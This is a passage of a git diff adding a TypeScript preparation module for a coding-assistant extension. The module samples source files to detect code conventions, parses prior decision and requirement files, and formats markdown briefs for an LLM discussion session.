+    // No language detected (no manifest) — use JS/TS defaults
+    extensionsToSample = SAMPLE_EXTENSIONS;
+  } else {
+    // Language detected but not in registry (e.g., Ruby, Haskell)
+    // Use universal extensions so we can still detect naming conventions
+    extensionsToSample = UNIVERSAL_SOURCE_EXTENSIONS;
+  }
+
+  // Filter to target language files, excluding tests and dist
+  const candidates = allFiles.filter((file) => {
+    // Check extension
+    const hasValidExtension = extensionsToSample.some((ext) => file.endsWith(ext));
+    if (!hasValidExtension) return false;
+
+    // Check exclusion patterns
+    for (const pattern of EXCLUDE_PATTERNS) {
+      if (pattern.test(file)) return false;
+    }
+
+    // Check for excluded directories in path
+    const parts = file.split(/[/\\]/);
+    for (const part of parts) {
+      if (SKIP_DIRS.has(part)) return false;
+    }
+
+    return true;
+  });
+
+  // Prioritize files in src/ directory
+  const srcFiles = candidates.filter((f) => f.startsWith("src/") || f.startsWith("src\\"));
+  const otherFiles = candidates.filter((f) => !f.startsWith("src/") && !f.startsWith("src\\"));
+
+  // Take SAMPLE_FILE_COUNT files, preferring src/
+  const sampled: string[] = [];
+
+  // First, add src files
+  for (const file of srcFiles) {
+    if (sampled.length >= SAMPLE_FILE_COUNT) break;
+    sampled.push(file);
+  }
+
+  // Then add other files if needed
+  for (const file of otherFiles) {
+    if (sampled.length >= SAMPLE_FILE_COUNT) break;
+    sampled.push(file);
+  }
+
+  return sampled;
+}
+
+/**
+ * Extract code patterns from sampled files.
+ *
+ * Pattern detection behavior:
+ * 1. When primaryLanguage exists in LANGUAGE_PATTERNS → uses language-specific patterns
+ * 2. When primaryLanguage is undefined (no manifest) → falls back to JS/TS patterns
+ *    since the sampled files are filtered by JS/TS extensions anyway
+ * 3. When primaryLanguage is a known value NOT in LANGUAGE_PATTERNS (e.g., "haskell",
+ *    "elixir") → returns "unknown" for language-specific patterns instead of running
+ *    JS/TS patterns which would produce misleading results
+ *
+ * Universal patterns (naming convention) always run regardless of language.
+ *
+ * @param basePath - Root directory of the project
+ * @param sampledFiles - Array of relative file paths
+ * @param primaryLanguage - Optional primary language identifier from detection.ts LANGUAGE_MAP
+ * @returns CodePatterns with detected patterns and evidence
+ */
+function extractPatterns(basePath: string, sampledFiles: string[], primaryLanguage?: string): CodePatterns {
+  const evidence = {
+    asyncStyle: [] as string[],
+    errorHandling: [] as string[],
+    namingConvention: [] as string[],
+  };
+
+  const counts = {
+    asyncAwait: 0,
+    callbacks: 0,
+    promises: 0,
+    tryCatch: 0,
+    errorCallbacks: 0,
+    resultTypes: 0,
+    camelCase: 0,
+    snakeCase: 0,
+    pascalCase: 0,
+  };
+
+  // Track how many files contain each pattern type (for formatted output)
+  const fileCounts = {
+    asyncAwait: 0,
+    promises: 0,
+    callbacks: 0,
+    tryCatch: 0,
+    errorCallbacks: 0,
+    resultTypes: 0,
+  };
+
+  // Get language-specific patterns if available
+  // When primaryLanguage is undefined, fall back to JS/TS (sampled files are JS/TS extensions)
+  // When primaryLanguage is set but not in registry, skip language-specific patterns entirely
+  const languageEntry = primaryLanguage 
+    ? LANGUAGE_PATTERNS[primaryLanguage] 
+    : LANGUAGE_PATTERNS["javascript/typescript"]; // Fallback for undefined only
+  
+  // Language is "unsupported" only when it's explicitly set but not in our registry
+  // undefined → use JS/TS fallback (the sampled files are .ts/.js anyway)
+  // "haskell" → unsupported, don't run JS patterns against Haskell code
+  const languageUnsupported = primaryLanguage !== undefined && !LANGUAGE_PATTERNS[primaryLanguage];
+
+  // If language is explicitly set but not in registry, add evidence explaining why patterns aren't available
+  if (languageUnsupported) {
+    evidence.asyncStyle.push(`Language "${primaryLanguage}" not in pattern registry — async style detection not available`);
+    evidence.errorHandling.push(`Language "${primaryLanguage}" not in pattern registry — error handling detection not available`);
+  }
+
+  for (const file of sampledFiles) {
+    let content: string;
+    try {
+      const fullPath = join(basePath, file);
+      const buffer = Buffer.alloc(MAX_FILE_SAMPLE_BYTES);
+      const fd = openSync(fullPath, "r");
+      try {
+        const bytesRead = readSync(fd, buffer, 0, MAX_FILE_SAMPLE_BYTES, 0);
+        content = buffer.toString("utf-8", 0, bytesRead);
+      } finally {
+        closeSync(fd);
+      }
+    } catch {
+      continue; // Skip unreadable files
+    }
+
+    // Only run language-specific patterns if we have a valid language entry
+    // This prevents misleading results from running JS/TS patterns against Haskell, etc.
+    if (!languageUnsupported && languageEntry) {
+      // Count async patterns using language-appropriate patterns
+      // Use String.match() to avoid mutating lastIndex on regex with /g flag
+      const asyncModernMatches = content.match(languageEntry.asyncStyle.modern) || [];
+      counts.asyncAwait += asyncModernMatches.length;
+      if (asyncModernMatches.length > 0) {
+        fileCounts.asyncAwait++;
+        if (evidence.asyncStyle.length < 3) {
+          evidence.asyncStyle.push(`${file}: ${languageEntry.asyncStyle.modernLabel} (${asyncModernMatches.length} occurrences)`);
+        }
+      }
+
+      // For JS/TS, also check callbacks (universal pattern)
+      if (primaryLanguage === "javascript/typescript") {
+        const callbackMatches = content.match(CALLBACK_RE) || [];
+        counts.callbacks += callbackMatches.length;
+        if (callbackMatches.length > 0) {
+          fileCounts.callbacks++;
+          if (evidence.asyncStyle.length < 3) {
+            evidence.asyncStyle.push(`${file}: callbacks (${callbackMatches.length} occurrences)`);
+          }
+        }
+      }
+
+      const asyncLegacyMatches = content.match(languageEntry.asyncStyle.legacy) || [];
+      counts.promises += asyncLegacyMatches.length;
+      if (asyncLegacyMatches.length > 0) {
+        fileCounts.promises++;
+        if (evidence.asyncStyle.length < 3) {
+          evidence.asyncStyle.push(`${file}: ${languageEntry.asyncStyle.legacyLabel} (${asyncLegacyMatches.length} occurrences)`);
+        }
+      }
+
+      // Count error handling patterns using language-appropriate patterns
+      const errorStructuredMatches = content.match(languageEntry.errorHandling.structured) || [];
+      counts.tryCatch += errorStructuredMatches.length;
+      if (errorStructuredMatches.length > 0) {
+        fileCounts.tryCatch++;
+        if (evidence.errorHandling.length < 3) {
+          evidence.errorHandling.push(`${file}: ${languageEntry.errorHandling.structuredLabel} (${errorStructuredMatches.length} occurrences)`);
+        }
+      }
+
+      const errorInlineMatches = content.match(languageEntry.errorHandling.inline) || [];
+      counts.errorCallbacks += errorInlineMatches.length;
+      if (errorInlineMatches.length > 0) {
+        fileCounts.errorCallbacks++;
+        if (evidence.errorHandling.length < 3) {
+          evidence.errorHandling.push(`${file}: ${languageEntry.errorHandling.inlineLabel} (${errorInlineMatches.length} occurrences)`);
+        }
+      }
+
+      // Result types are still useful for some languages (Rust, fp-ts)
+      const resultTypeMatches = content.match(RESULT_TYPE_RE) || [];
+      counts.resultTypes += resultTypeMatches.length;
+      if (resultTypeMatches.length > 0) {
+        fileCounts.resultTypes++;
+        if (evidence.errorHandling.length < 3) {
+          evidence.errorHandling.push(`${file}: result-types (${resultTypeMatches.length} occurrences)`);
+        }
+      }
+    }
+
+    // Count naming convention patterns (universal across all languages)
+    // These patterns work regardless of whether the language is in the registry
+    const camelMatches = content.match(CAMEL_CASE_RE) || [];
+    counts.camelCase += camelMatches.length;
+
+    const snakeMatches = content.match(SNAKE_CASE_RE) || [];
+    counts.snakeCase += snakeMatches.length;
+
+    const pascalMatches = content.match(PASCAL_CASE_RE) || [];
+    counts.pascalCase += pascalMatches.length;
+  }
+
+  // Add naming evidence
+  if (counts.camelCase > 0) {
+    evidence.namingConvention.push(`camelCase: ${counts.camelCase} occurrences`);
+  }
+  if (counts.snakeCase > 0) {
+    evidence.namingConvention.push(`snake_case: ${counts.snakeCase} occurrences`);
+  }
+  if (counts.pascalCase > 0) {
+    evidence.namingConvention.push(`PascalCase: ${counts.pascalCase} occurrences`);
+  }
+
+  // For explicitly set but unrecognized languages, return "unknown" for language-specific patterns
+  // but still provide naming convention detection (which is universal)
+  if (languageUnsupported) {
+    return {
+      asyncStyle: "unknown",
+      errorHandling: "unknown",
+      namingConvention: determineNamingConvention(counts),
+      evidence,
+      fileCounts,
+    };
+  }
+
+  return {
+    asyncStyle: determineAsyncStyle(counts),
+    errorHandling: determineErrorHandling(counts),
+    namingConvention: determineNamingConvention(counts),
+    evidence,
+    fileCounts,
+  };
+}
+
+/**
+ * Determine the primary async style based on pattern counts.
+ */
+function determineAsyncStyle(counts: {
+  asyncAwait: number;
+  callbacks: number;
+  promises: number;
+}): CodePatterns["asyncStyle"] {
+  const total = counts.asyncAwait + counts.callbacks + counts.promises;
+  if (total === 0) return "unknown";
+
+  const asyncAwaitRatio = counts.asyncAwait / total;
+  const callbackRatio = counts.callbacks / total;
+  const promiseRatio = counts.promises / total;
+
+  // If one style dominates (>60%), report it
+  if (asyncAwaitRatio > 0.6) return "async/await";
+  if (callbackRatio > 0.6) return "callbacks";
+  if (promiseRatio > 0.6) return "promises";
+
+  return "mixed";
+}
+
+/**
+ * Determine the primary error handling style based on pattern counts.
+ */
+function determineErrorHandling(counts: {
+  tryCatch: number;
+  errorCallbacks: number;
+  resultTypes: number;
+}): CodePatterns["errorHandling"] {
+  const total = counts.tryCatch + counts.errorCallbacks + counts.resultTypes;
+  if (total === 0) return "unknown";
+
+  const tryCatchRatio = counts.tryCatch / total;
+  const errorCallbackRatio = counts.errorCallbacks / total;
+  const resultTypeRatio = counts.resultTypes / total;
+
+  if (tryCatchRatio > 0.6) return "try/catch";
+  if (errorCallbackRatio > 0.6) return "error-callbacks";
+  if (resultTypeRatio > 0.6) return "result-types";
+
+  return "mixed";
+}
+
+/**
+ * Determine the primary naming convention based on pattern counts.
+ */
+function determineNamingConvention(counts: {
+  camelCase: number;
+  snakeCase: number;
+  pascalCase: number;
+}): CodePatterns["namingConvention"] {
+  const total = counts.camelCase + counts.snakeCase + counts.pascalCase;
+  if (total === 0) return "unknown";
+
+  // PascalCase is usually for types/classes, so we compare camelCase vs snake_case
+  const camelRatio = counts.camelCase / total;
+  const snakeRatio = counts.snakeCase / total;
+
+  if (camelRatio > 0.6) return "camelCase";
+  if (snakeRatio > 0.6) return "snake_case";
+  if (counts.pascalCase > counts.camelCase && counts.pascalCase > counts.snakeCase) return "PascalCase";
+
+  return "mixed";
+}
+
+// ─── Formatting ─────────────────────────────────────────────────────────────────
+
+/**
+ * Format a CodebaseBrief as LLM-readable markdown.
+ *
+ * @param brief - The codebase brief to format
+ * @returns Markdown string capped at MAX_CODEBASE_BRIEF_CHARS
+ */
+export function formatCodebaseBrief(brief: CodebaseBrief): string {
+  const sections: string[] = [];
+
+  // Tech Stack section
+  sections.push("## Tech Stack");
+  if (brief.techStack.primaryLanguage) {
+    sections.push(`- **Language:** ${brief.techStack.primaryLanguage}`);
+  }
+  if (brief.techStack.packageManager) {
+    sections.push(`- **Package Manager:** ${brief.techStack.packageManager}`);
+  }
+  if (brief.techStack.detectedFiles.length > 0) {
+    const files = brief.techStack.detectedFiles.slice(0, 10).join(", ");
+    sections.push(`- **Project Files:** ${files}`);
+  }
+  sections.push(`- **Monorepo:** ${brief.techStack.isMonorepo ? "Yes" : "No"}`);
+  sections.push(`- **Has Tests:** ${brief.techStack.hasTests ? "Yes" : "No"}`);
+  sections.push(`- **Has CI:** ${brief.techStack.hasCI ? "Yes" : "No"}`);
+
+  // Module Structure section
+  sections.push("");
+  sections.push("## Module Structure");
+  if (brief.moduleStructure.topLevelDirs.length > 0) {
+    sections.push(`- **Top-level dirs:** ${brief.moduleStructure.topLevelDirs.join(", ")}`);
+  }
+  if (brief.moduleStructure.srcSubdirs.length > 0) {
+    sections.push(`- **Source subdirs:** ${brief.moduleStructure.srcSubdirs.join(", ")}`);
+  }
+
+  // Code Patterns section
+  sections.push("");
+  sections.push("## Code Patterns");
+  
+  // Format async style with file counts
+  const fc = brief.patterns.fileCounts;
+  if (brief.patterns.asyncStyle === "unknown") {
+    sections.push(`- **Async Style:** ${brief.patterns.asyncStyle}`);
+  } else {
+    const asyncParts: string[] = [];
+    if (fc.asyncAwait > 0) asyncParts.push(`${fc.asyncAwait} async/await`);
+    if (fc.promises > 0) asyncParts.push(`${fc.promises} .then()`);
+    if (fc.callbacks > 0) asyncParts.push(`${fc.callbacks} callback`);
+    const asyncDetail = asyncParts.length > 0 ? ` (${asyncParts.map(p => p + " files").join(" vs ")})` : "";
+    sections.push(`- **Async Style:** ${brief.patterns.asyncStyle}${asyncDetail}`);
+  }
+  
+  // Format error handling with file counts
+  if (brief.patterns.errorHandling === "unknown") {
+    sections.push(`- **Error Handling:** ${brief.patterns.errorHandling}`);
+  } else {
+    const errorParts: string[] = [];
+    if (fc.tryCatch > 0) errorParts.push(`${fc.tryCatch} try/catch`);
+    if (fc.errorCallbacks > 0) errorParts.push(`${fc.errorCallbacks} error-callback`);
+    if (fc.resultTypes > 0) errorParts.push(`${fc.resultTypes} result-type`);
+    const errorDetail = errorParts.length > 0 ? ` (${errorParts.map(p => p + " files").join(" vs ")})` : "";
+    sections.push(`- **Error Handling:** ${brief.patterns.errorHandling}${errorDetail}`);
+  }
+  
+  sections.push(`- **Naming Convention:** ${brief.patterns.namingConvention}`);
+
+  let result = sections.join("\n");
+
+  // Truncate if necessary
+  if (result.length > MAX_CODEBASE_BRIEF_CHARS) {
+    result = result.slice(0, MAX_CODEBASE_BRIEF_CHARS - 3) + "...";
+  }
+
+  return result;
+}
+
+// ─── Prior Context Aggregation ──────────────────────────────────────────────────
+
+/** Maximum characters per section in the prior context brief. */
+const MAX_SECTION_CHARS = 2000;
+
+/** Maximum total characters for the prior context brief. */
+const MAX_PRIOR_CONTEXT_CHARS = 6000;
+
+/**
+ * Aggregate prior context from GSD artifacts.
+ *
+ * Reads DECISIONS.md, REQUIREMENTS.md, KNOWLEDGE.md from the .gsd directory
+ * and milestone summaries from each milestone's MILESTONE-SUMMARY.md file.
+ *
+ * @param basePath - Root directory of the project (contains .gsd/)
+ * @returns PriorContextBrief with aggregated context
+ */
+export async function aggregatePriorContext(basePath: string): Promise<PriorContextBrief> {
+  const gsdPath = join(basePath, ".gsd");
+
+  // Load decisions
+  const decisionsContent = await loadFile(join(gsdPath, "DECISIONS.md"));
+  const decisions = parseDecisions(decisionsContent);
+
+  // Load requirements
+  const requirementsContent = await loadFile(join(gsdPath, "REQUIREMENTS.md"));
+  const requirements = parseRequirements(requirementsContent);
+
+  // Load knowledge
+  const knowledgeContent = await loadFile(join(gsdPath, "KNOWLEDGE.md"));
+  const knowledge = truncateSection(knowledgeContent || "", MAX_SECTION_CHARS);
+
+  // Load milestone summaries
+  const summaries = await loadMilestoneSummaries(gsdPath);
+
+  return {
+    decisions,
+    requirements,
+    knowledge: knowledge || "No prior knowledge recorded.",
+    summaries: summaries || "No prior milestone summaries.",
+  };
+}
+
+/**
+ * Parse decisions from DECISIONS.md content.
+ *
+ * Groups decisions by scope (e.g., "pattern", "architecture").
+ */
+function parseDecisions(content: string | null): PriorContextBrief["decisions"] {
+  const byScope = new Map<string, DecisionEntry[]>();
+
+  if (!content) {
+    return { byScope, totalCount: 0 };
+  }
+
+  // Parse table rows: | D001 | M001/S01 | pattern | ... |
+  // Skip header rows (start with | # or |---)
+  const lines = content.split("\n");
+  let totalCount = 0;
+
+  for (const line of lines) {
+    const trimmed = line.trim();
+
+    // Skip non-table lines, header, and separator rows
+    if (!trimmed.startsWith("|")) continue;
+    if (trimmed.startsWith("| #") || trimmed.startsWith("|---") || trimmed.startsWith("| -")) continue;
+
+    // Parse: | D001 | M001/S01 | pattern | Decision | Choice | Rationale | Revisable? | Made By |
+    const cells = trimmed
+      .split("|")
+      .map((c) => c.trim())
+      .filter((c) => c.length > 0);
+
+    if (cells.length < 6) continue;
+
+    const id = cells[0]; // D001
+    if (!id.match(/^D\d+$/)) continue; // Must be a decision ID
+
+    const scope = cells[2]; // pattern, architecture, etc.
+    const decision = cells[3];
+    const choice = cells[4];
+    const rationale = cells[5];
+
+    const entry: DecisionEntry = { id, scope, decision, choice, rationale };
+
+    if (!byScope.has(scope)) {
+      byScope.set(scope, []);
+    }
+    byScope.get(scope)!.push(entry);
+    totalCount++;
+  }
+
+  return { byScope, totalCount };
+}
+
+/**
+ * Parse requirements from REQUIREMENTS.md content.
+ *
+ * Groups requirements by status (active, validated, deferred).
+ */
+function parseRequirements(content: string | null): PriorContextBrief["requirements"] {
+  const result: PriorContextBrief["requirements"] = {
+    active: [],
+    validated: [],
+    deferred: [],
+    totalCount: 0,
+  };
+
+  if (!content) {
+    return result;
+  }
+
+  // Parse requirement entries: ### R101 — Description
+  // Look for Status: line to determine status
+  const reqBlocks = content.split(/(?=^### R\d+)/m);
+
+  for (const block of reqBlocks) {
+    const idMatch = block.match(/^### (R\d+)\s*—\s*(.+)/m);
+    if (!idMatch) continue;
+
+    const id = idMatch[1];
+    const description = idMatch[2].trim();
+
+    // Extract status from "- Status: active" line
+    const statusMatch = block.match(/^-\s*Status:\s*(\w+)/m);
+    const statusRaw = statusMatch ? statusMatch[1].toLowerCase() : "active";
+
+    let status: RequirementEntry["status"] = "active";
+    if (statusRaw === "validated") status = "validated";
+    else if (statusRaw === "deferred") status = "deferred";
+    else if (statusRaw === "out-of-scope" || statusRaw === "outofscope") status = "out-of-scope";
+
+    const entry: RequirementEntry = { id, description, status };
+
+    if (status === "active") result.active.push(entry);
+    else if (status === "validated") result.validated.push(entry);
+    else if (status === "deferred") result.deferred.push(entry);
+
+    result.totalCount++;
+  }
+
+  return result;
+}
+
+/**
+ * Load and combine milestone summaries from each milestone directory.
+ *
+ * Returns combined content, truncated to MAX_SECTION_CHARS.
+ */
+async function loadMilestoneSummaries(gsdPath: string): Promise<string> {
+  const milestonesPath = join(gsdPath, "milestones");
+  const summaries: string[] = [];
+
+  try {
+    const entries = readdirSyncNode(milestonesPath, { withFileTypes: true });
+    const milestoneIds = entries
+      .filter((e) => e.isDirectory() && e.name.match(/^M\d+/))
+      .map((e) => e.name)
+      .sort(); // Sort by milestone ID
+
+    for (const mid of milestoneIds) {
+      const summaryPath = join(milestonesPath, mid, "MILESTONE-SUMMARY.md");
+      const content = await loadFile(summaryPath);
+      if (content) {
+        // Extract the one-liner and first section for brevity
+        const oneLiner = extractOneLiner(content);
+        summaries.push(`### ${mid}\n${oneLiner}`);
+      }
+    }
+  } catch {
+    // Milestones directory doesn't exist or not readable
+  }
+
+  if (summaries.length === 0) {
+    return "";
+  }
+
+  return truncateSection(summaries.join("\n\n"), MAX_SECTION_CHARS);
+}
+
+/**
+ * Extract the one-liner summary from a MILESTONE-SUMMARY.md.
+ *
+ * Looks for bold text on a line by itself (e.g., "**Completed X and Y**").
+ */
+function extractOneLiner(content: string): string {
+  const lines = content.split("\n");
+  for (const line of lines) {
+    const trimmed = line.trim();
+    // Look for **bold text** that's the whole line
+    if (trimmed.startsWith("**") && trimmed.endsWith("**") && trimmed.length > 4) {
+      return trimmed.slice(2, -2);
+    }
+  }
+  // Fallback: return first non-empty, non-heading line
+  for (const line of lines) {
+    const trimmed = line.trim();
+    if (trimmed && !trimmed.startsWith("#") && !trimmed.startsWith("---")) {
+      return trimmed.slice(0, 200);
+    }
+  }
+  return "Summary available";
+}
+
+/**
+ * Truncate content to maxChars without cutting mid-section.
+ *
+ * Prefers to cut at section boundaries (## headings) or paragraph breaks.
+ */
+function truncateSection(content: string, maxChars: number): string {
+  if (content.length <= maxChars) {
+    return content;
+  }
+
+  const SECTION_SUFFIX = "\n\n[truncated]"; // 14 chars
+  const WORD_SUFFIX = "... [truncated]"; // 15 chars
+
+  // Reserve space for suffix in all slicing operations
+  const sectionMaxSlice = maxChars - SECTION_SUFFIX.length;
+  const wordMaxSlice = maxChars - WORD_SUFFIX.length;
+
+  // Try to cut at a section boundary
+  const truncated = content.slice(0, sectionMaxSlice);
+  const lastSection = truncated.lastIndexOf("\n## ");
+  if (lastSection > sectionMaxSlice * 0.5) {
+    return truncated.slice(0, lastSection).trim() + SECTION_SUFFIX;
+  }
+
+  // Try to cut at a paragraph break
+  const lastPara = truncated.lastIndexOf("\n\n");
+  if (lastPara > sectionMaxSlice * 0.5) {
+    return truncated.slice(0, lastPara).trim() + SECTION_SUFFIX;
+  }
+
+  // Last resort: cut at word boundary
+  const wordTruncated = content.slice(0, wordMaxSlice);
+  const lastSpace = wordTruncated.lastIndexOf(" ");
+  if (lastSpace > wordMaxSlice * 0.8) {
+    return wordTruncated.slice(0, lastSpace).trim() + WORD_SUFFIX;
+  }
+
+  return content.slice(0, wordMaxSlice) + WORD_SUFFIX;
+}
+
+/**
+ * Format a PriorContextBrief as LLM-readable markdown.
+ *
+ * @param brief - The prior context brief to format
+ * @returns Markdown string capped at MAX_PRIOR_CONTEXT_CHARS
+ */
+export function formatPriorContextBrief(brief: PriorContextBrief): string {
+  const sections: string[] = [];
+
+  // Decisions section
+  sections.push("## Prior Decisions");
+  if (brief.decisions.totalCount === 0) {
+    sections.push("No prior decisions recorded.");
+  } else {
+    sections.push(`${brief.decisions.totalCount} decisions recorded.`);
+    sections.push("");
+
+    // Group by scope
+    for (const [scope, entries] of brief.decisions.byScope) {
+      sections.push(`### ${scope}`);
+      for (const entry of entries.slice(0, 5)) { // Limit per scope
+        sections.push(`- **${entry.id}:** ${entry.decision} → ${entry.choice}`);
+      }
+      if (entries.length > 5) {
+        sections.push(`- _(${entries.length - 5} more in this scope)_`);
+      }
+      sections.push("");
+    }
+  }
+
+  // Requirements section
+  sections.push("## Prior Requirements");
+  const reqTotal = brief.requirements.totalCount;
+  if (reqTotal === 0) {
+    sections.push("No prior requirements recorded.");
+  } else {
+    sections.push(
+      `${reqTotal} requirements: ${brief.requirements.active.length} active, ` +
+        `${brief.requirements.validated.length} validated, ` +
+        `${brief.requirements.deferred.length} deferred.`,
+    );
+    sections.push("");
+
+    // Show active requirements (most relevant)
+    if (brief.requirements.active.length > 0) {
+      sections.push("### Active");
+      for (const req of brief.requirements.active.slice(0, 10)) {
+        sections.push(`- **${req.id}:** ${req.description}`);
+      }
+      if (brief.requirements.active.length > 10) {
+        sections.push(`- _(${brief.requirements.active.length - 10} more active)_`);
+      }
+      sections.push("");
+    }
+
+    // Show validated (recently completed)
+    if (brief.requirements.validated.length > 0) {
+      sections.push("### Validated");
+      for (const req of brief.requirements.validated.slice(0, 5)) {
+        sections.push(`- **${req.id}:** ${req.description}`);
+      }
+      if (brief.requirements.validated.length > 5) {
+        sections.push(`- _(${brief.requirements.validated.length - 5} more validated)_`);
+      }
+      sections.push("");
+    }
+  }
+
+  // Knowledge section
+  sections.push("## Prior Knowledge");
+  if (brief.knowledge === "No prior knowledge recorded.") {
+    sections.push(brief.knowledge);
+  } else {
+    sections.push(truncateSection(brief.knowledge, MAX_SECTION_CHARS));
+  }
+  sections.push("");
+
+  // Summaries section
+  sections.push("## Prior Milestone Summaries");
+  if (brief.summaries === "No prior milestone summaries.") {
+    sections.push(brief.summaries);
+  } else {
+    sections.push(truncateSection(brief.summaries, MAX_SECTION_CHARS));
+  }
+
+  let result = sections.join("\n");
+
+  // Final truncation if total exceeds max
+  if (result.length > MAX_PRIOR_CONTEXT_CHARS) {
+    result = truncateSection(result, MAX_PRIOR_CONTEXT_CHARS);
+  }
+
+  return result;
+}
+
+// ─── Ecosystem Research ─────────────────────────────────────────────────────────
+
+/** Maximum characters for the ecosystem brief. */
+const MAX_ECOSYSTEM_BRIEF_CHARS = 4000;
+
+/**
+ * Research the ecosystem for best practices and known issues.
+ *
+ * Ecosystem research is now performed during the discussion session (between
+ * Layer 1 and Layer 2) using whatever web search tools are available to the
+ * LLM — native Anthropic web search for Claude, search-the-web for other
+ * providers. The preparation phase focuses on mechanical work only.
+ *
+ * @param _techStack - Array of technology names from codebase analysis (unused)
+ * @param _basePath - Root directory of the project (unused)
+ * @returns EcosystemBrief indicating research happens during discussion
+ */
+export async function researchEcosystem(
+  _techStack: string[],
+  _basePath: string,
+): Promise<EcosystemBrief> {
+  return {
+    available: false,
+    queries: [],
+    findings: [],
+    skippedReason: "Ecosystem research is performed during the discussion using web search tools, not during preparation.",
+  };
+}
+
+/**
+ * Format an EcosystemBrief as LLM-readable markdown.
+ *
+ * @param brief - The ecosystem brief to format
+ * @returns Markdown string capped at MAX_ECOSYSTEM_BRIEF_CHARS
+ */
+// ─── Preparation Result ─────────────────────────────────────────────────────────
+
+/**
+ * Combined result from the preparation phase.
+ * Includes briefs from all three analyzers, plus metadata about the run.
+ */
+export interface PreparationResult {
+  /** Codebase analysis brief. */
+  codebase: CodebaseBrief;
+  /** Formatted codebase brief as markdown. */
+  codebaseBrief: string;
+  /** Prior context brief. */
+  priorContext: PriorContextBrief;
+  /** Formatted prior context brief as markdown. */
+  priorContextBrief: string;
+  /** Ecosystem research brief. */
+  ecosystem: EcosystemBrief;
+  /** Formatted ecosystem brief as markdown. */
+  ecosystemBrief: string;
+  /** Whether preparation was enabled. */
+  enabled: boolean;
+  /** Whether ecosystem research was performed. */
+  ecosystemResearchPerformed: boolean;
+  /** Total duration of preparation in milliseconds. */
+  durationMs: number;
+}
+
+/**
+ * Minimal UI context interface for preparation phase.
+ * Mirrors the notify method from ExtensionUIContext.
+ */
+export interface PreparationUIContext {
+  notify(message: string, type?: "info" | "warning" | "error" | "success"): void;
+}
+
+/**
+ * Minimal preferences interface for preparation phase.
+ * Only includes the preferences needed by runPreparation.
+ */
+export interface PreparationPreferences {
+  /** Enable the preparation phase. Default: true. */
+  discuss_preparation?: boolean;
+  /** Enable web research during preparation. Default: true. */
+  discuss_web_research?: boolean;
+  /** Depth of analysis. Default: "standard". */
+  discuss_depth?: "quick" | "standard" | "thorough";
+}
+
+/**
+ * Run the preparation phase before a discussion session.
+ *
+ * Orchestrates all three analyzers (codebase, prior context, ecosystem)
+ * with TUI progress updates. Returns early if preparation is disabled.
+ *
+ * @param basePath - Root directory of the project
+ * @param ui - UI context for progress notifications (null = silent mode)
+ * @param prefs - Preferences controlling preparation behavior
+ * @returns PreparationResult with all briefs and metadata
+ */
+export async function runPreparation(
+  basePath: string,
+  ui: PreparationUIContext | null,
+  prefs: PreparationPreferences,
+): Promise<PreparationResult> {
+  const startTime = performance.now();
+
+  // Check if preparation is disabled
+  const preparationEnabled = prefs.discuss_preparation !== false; // Default: true
+
+  if (!preparationEnabled) {
+    // Return minimal result with empty briefs
+    const emptyCodebase: CodebaseBrief = {
+      techStack: {
+        primaryLanguage: undefined,
+        detectedFiles: [],
+        packageManager: undefined,
+        isMonorepo: false,
+        hasTests: false,
+        hasCI: false,
+      },
+      moduleStructure: {
+        topLevelDirs: [],
+        srcSubdirs: [],
+        totalFilesSampled: 0,
+      },
+      patterns: {
+        asyncStyle: "unknown",
+        errorHandling: "unknown",
+        namingConvention: "unknown",
+        evidence: {
+          asyncStyle: [],
+          errorHandling: [],
+          namingConvention: [],
+        },
+        fileCounts: {
+          asyncAwait: 0,
+          promises: 0,
+          callbacks: 0,
+          tryCatch: 0,
+          errorCallbacks: 0,
+          resultTypes: 0,
+        },
+      },
+      sampledFiles: [],
+    };
+
+    const emptyPriorContext: PriorContextBrief = {
+      decisions: {
+        byScope: new Map(),
+        totalCount: 0,
+      },
+      requirements: {
+        active: [],
+        validated: [],
+        deferred: [],
+        totalCount: 0,
+      },
+      knowledge: "No prior knowledge recorded.",
+      summaries: "No prior milestone summaries.",
+    };
+
+    const emptyEcosystem: EcosystemBrief = {
+      available: false,
+      queries: [],
+      findings: [],
+      skippedReason: "Preparation phase disabled.",
+    };
+
+    return {
+      codebase: emptyCodebase,
+      codebaseBrief: "",
+      priorContext: emptyPriorContext,
+      priorContextBrief: "",
+      ecosystem: emptyEcosystem,
+      ecosystemBrief: "",
+      enabled: false,
+      ecosystemResearchPerformed: false,
+      durationMs: performance.now() - startTime,
+    };
+  }
+
+  // --- Phase 1: Analyze codebase ---
+  ui?.notify("Analyzing codebase...", "info");
+  const codebase = await analyzeCodebase(basePath);
+  const codebaseBrief = formatCodebaseBrief(codebase);
+  ui?.notify("✓ Analyzed codebase", "success");
+
+  // --- Phase 2: Review prior context ---
+  ui?.notify("Reviewing prior context...", "info");
+  const priorContext = await aggregatePriorContext(basePath);
+  const priorContextBrief = formatPriorContextBrief(priorContext);
+  ui?.notify("✓ Reviewed prior context", "success");
+
+  // --- Ecosystem research ---
+  // Ecosystem research is now performed during the discussion session (between
+  // Layer 1 and Layer 2) using available web search tools. The preparation
+  // phase focuses on mechanical work only.
+  const ecosystem: EcosystemBrief = await researchEcosystem([], basePath);
+  const ecosystemBrief = formatEcosystemBrief(ecosystem);
+
+  return {
+    codebase,
+    codebaseBrief,
+    priorContext,
+    priorContextBrief,
+    ecosystem,
+    ecosystemBrief,
+    enabled: true,
+    ecosystemResearchPerformed: false,
+    durationMs: performance.now() - startTime,
+  };
+}
+
+/**
+ * Format an EcosystemBrief as LLM-readable markdown.
+ *
+ * Since ecosystem research now always returns unavailable from the preparation
+ * phase (research happens during discussion using web search tools), this
+ * function returns a simple fixed message.
+ *
+ * @param _brief - The ecosystem brief (unused, always unavailable from preparation)
+ * @returns Markdown string directing the LLM to perform research during discussion
+ */
+export function formatEcosystemBrief(_brief: EcosystemBrief): string {
+  return "## Ecosystem Research\n\nEcosystem research is performed during the discussion using web search tools.";
+}
diff --git a/src/resources/extensions/gsd/prompt-loader.ts b/src/resources/extensions/gsd/prompt-loader.ts
index b5e2a37ab..aa01d583a 100644
--- a/src/resources/extensions/gsd/prompt-loader.ts
+++ b/src/resources/extensions/gsd/prompt-loader.ts
@@ -22,6 +22,7 @@ import { GSDError, GSD_PARSE_ERROR } from "./errors.js";
 import { join, dirname } from "node:path";
 import { fileURLToPath } from "node:url";
 import { homedir } from "node:os";
+import { logWarning } from "./workflow-logger.js";
 
 /**
  * Resolve the GSD extension directory.
@@ -50,6 +51,14 @@ const __extensionDir = resolveExtensionDir();
 const promptsDir = join(__extensionDir, "prompts");
 const templatesDir = join(__extensionDir, "templates");
 
+/**
+ * Return the resolved templates directory path for use in prompts.
